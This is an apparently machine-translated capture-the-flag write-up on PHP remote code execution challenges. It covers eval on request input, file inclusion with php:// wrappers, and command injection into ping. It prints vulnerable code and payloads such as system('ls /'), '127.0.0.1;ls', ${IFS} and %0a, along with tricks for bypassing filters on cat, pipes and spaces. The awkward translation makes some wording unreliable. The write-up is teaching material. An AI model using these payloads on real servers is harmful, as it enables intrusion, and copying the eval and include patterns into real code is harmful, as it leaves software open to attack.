rce： Remote code execution vulnerability
Divided into remote command execution ping And remote code execution evel.
In fact, this is an interface , It allows attackers to inject operating system commands or code directly into the background server , To control the background system , This is it. RCE Loophole . Equivalent to directly controlling the server computer cmd Command line ！ High risk vulnerability ！

eval perform

<?php
    if(isset($_REQUEST['cmd'])){
    
        eval($_REQUEST['cmd']);
    }
	else{
    
        highlight_file(__FILE__);
    }
?>

Pass the reference to cmd Come on eval

/?cmd=system("ls /");// There is no root directory here flag  So look at the next level of directory 

After finding Again cat /flag_****

File contains

Use here strpos function

strpos: Find where the string first appears

int strpos ( string $haystack , mixed $needle [, int $offset = 0 ] )

Topic use

if(!strpos($_GET["file"],"flag")){
    // nothing flag Characters to run 
    include $_GET["file"];
}

To include files , And the following shell.txt contain eval Loophole

So include it （shell.txt No, “flag” character So here strpos No influence ）

adopt get( Include files ) post( The ginseng ) And used to get flag

php info

<?php
if (isset($_GET['file'])){
      
	if ( substr($_GET["file"], 0, 6) === "php://" ) {
    
        include($_GET["file"]);  
         }
    else {
     
        echo "Hacker!!!";
    	}}
else {
    
    highlight_file(__FILE__);}?>
<hr>i don't have shell, how to get flag? <br><a href="phpinfo.php">phpinfo</a> 

Click on phpinfo link You can see php Environmental Science

php://input

php:// —  Access individual inputs / Output stream （I/O streams）

PHP  Some miscellaneous inputs are provided / Output （IO） flow , allow access to  PHP  I / O stream 、 Standard I / O and error descriptors ,    In the memory 、 The temporary file stream of disk backup and the filter that can operate other read and write file resources .  

php://input It's a read-only stream that can access the requested raw data .

Read source code

Look at the environment Can't use php://input

<?php
error_reporting(E_ALL);
if (isset($_GET['file'])) {
    
    if ( substr($_GET["file"], 0, 6) === "php://" ) {
    
        include($_GET["file"]);
    } else {
    
        echo "Hacker!!!";
    }
} else {
    
    highlight_file(__FILE__);
}
?>

But it must also be php:// start

php://filter

Remote contains

Same as phpinfo Do the same

Command injection

Enter the command

127.0.0.1;ls

then cat There was a problem

The output is limited

So the pipe symbol is used to limit the output base64

Get it and decode it

Filter cat

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/cat/", $ip, $m)) {
    / It's filtered out cat
        $cmd = "ping -c 4 {
      $ip}";
        exec($cmd, $res);
    } 
    else {
    
        $res = $m;
    }
}
?>

<pre>
<?php
    if ($res) {
    
        print_r($res);
    }
?>
</pre>
<?php
	show_source(__FILE__);
?>
</body>
</html>

more

Linux more Command similar cat , But it will be displayed page by page , More convenient for users to read page by page , And the most basic command is to press the blank key （space） The next page shows , Press b The key will go back （back） One page shows , It also has the function of searching for strings （ And vi be similar ）, Documentation in use , Please press h .

more [-dlfpcsu] [-num] [+/pattern] [+linenum] [fileNames..]

Filter space

stay linux Space available in < or ${IFS} Instead of

Filter operators

cat [file]|base64 You can also use base64 [file]

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||\&)/", $ip, $m)) {
    
        $cmd = "ping -c 4 {
      $ip}";
        exec($cmd, $res);
    } else {
    
        $res = $m;
    }
}
?>

Comprehensive practice

!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip

; It can be used %0a(url code ) cat use base64 flag Use regular f*** *lag etc. Space with ${IFS}